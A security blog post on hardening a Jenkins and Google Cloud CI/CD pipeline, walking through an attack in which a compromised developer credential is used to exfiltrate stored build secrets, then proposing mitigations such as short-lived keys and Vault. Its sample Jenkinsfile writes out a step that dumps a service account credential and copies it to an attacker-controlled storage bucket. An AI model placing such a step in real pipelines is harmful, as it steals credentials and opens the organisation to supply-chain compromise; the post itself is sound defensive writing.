The modern enterprise considers its CI/CD pipeline one of its most critical assets. However, the need to support developers in rapid tool exploration and iteration often drives DevOps teams to be fairly loose with repository and build controls. The great challenge of securing CI/CD lies in the nature of the beast. Building arbitrary code and CI/CD scripting tools grant the attacker RCE from the get-go. In this blog we examine a fairly robust architecture, how to break it, and how to further harden the design.

Picture this scenario

Our model is a security conscious enterprise with build services hosted in their datacenter but deployment to the cloud. Initially there may be lots of developers with commit permissions to the repo and little control over source code or container lineage. Given the recent Docker Hub breach, the security team wants to take steps to harden their system against supply chain attacks or the blast radius of a developer token or laptop compromise.

The security team has implemented the following changes:

  • Git hooks are required to prevent accidental credential check-ins for all repositories.
  • Developers are granted wide permissions to create repositories and build in a dedicated dev build project using Cloud Build. Containers are assumed to be malicious but cordoned to their own projects or GCP build infrastructure.
  • All commits to repos which can enter stage or dev environments require Dockerfiles with approved lineages (FROM <trusted whitelist>) and approval of 1 or more developers to merge.
  • All secrets used in build jobs are managed by the Jenkins administrators. Secrets are securely passed to the administrators who input them into Jenkins credentials manager and only permit them to be read by the repos which require them.
  • Networking egress is locked down from build agents, only whitelisting GCP Services like Storage and Container Registry.

Taken together, the architecture looks like this:

cloud architecture example

We will now break this.

Jenkinsfile Credentials Attack

Assume an attacker has compromised write permissions to a GitHub repo by the Docker Hub breach or a phishing attack leading to developer laptop compromise. Our attacker wishes to escalate privilege by obtaining credentials stored by the Jenkins server.

Jenkins builds are triggered on commits to feature branches in the source repo and Jenkins agents run the Jenkinsfile found in the repo. A reviewer is not required on pushes, only on a merge requests, so the single Git credential will get code execution on Jenkins. Secrets are managed with Jenkins credentials manager. Below is a sample Jenkinsfile snippet.

		Jenkinsfile (Pipeline with credentials management)pipeline {environment {credentials = credentials('jenkins-gcp-service-account')}stages {stage('Malicious Stage') {steps {  // use the credentials to upload to a// Storage Bucket or// push to gcr.io owned by company// OR execute a malicious groovy scriptcat $credentials > credentials.txtgsutil cp credentials.txt gs://attacker-controlled-bucket/       }}}}	

The attacker is only interested in credentials for staging or production, having deemed the dev environments are a dead end. But the attacker only has one git credential. However, the Jenkins credentials manager has another, used to tag releases and such. If this credential is not protected and it is not a granularly scoped token, then the attacker can then create the commit with the Jenkins Git compromised credential and approve it with their developer compromised credential.

Allowing developers to design the build pipeline via a Jenkinsfile is a great benefit, but here that convenience of a Jenkinsfile controlled by an attacker will be leveraged. The attacker knows that the build infrastructure is likely to put artifacts in Storage Buckets and therefore storage.googleapis.com will be whitelisted, even though exfiltrating to the internet at large is blocked by network egress rules. The attacker simply stores the credentials obtained in the Jenkinsfile stage and exports it to their own Storage Bucket.

Mitigation for Jenkinsfile Credentials Attack

The problem here is that the Jenkins credentials manager is supplying Jenkins jobs with permanent credentials. Because a Jenkins job is low trust, every job should refresh the token with a short timeout and over-write the credential. Use a seed job to wrap the Jenkinsfile in a pre-Jenkinsfile step which generates a new service account key, and inject only that into the environment. Then delete the key on a post-Jenkinsfile step. With gcloud, the key does not have an expiry, but with the Rest API, short expiry can be set as an added protection in case the post job fails to run.

gcloud iam service-accounts keys create ~/key.json
   --iam-account [SA-NAME]@[PROJECT-ID].iam.gserviceaccount.com
# run Jenkinsfilegcloud iam service-accounts keys delete [KEY-ID]
   --iam-account [SA-NAME]@[PROJECT-ID].iam.gserviceaccount.com

Although this helps reduce the utility of exporting credentials, the attacker still has use of the creds for the duration of the build step. An even better solution would be to use Hashicorp Vault to get full auditing of secrets and advanced features like dynamic secrets and one time use secrets. The goal would be to end up so that the attacker can only use the credentials if they cause the build to fail (by blocking re-use of run-specific creds), thus alerting administrators.

Another way to block exfiltration is extending Google Private Access to the Datacenter. See the link below and my GCP Service Controls to prevent data exfiltration blog.

References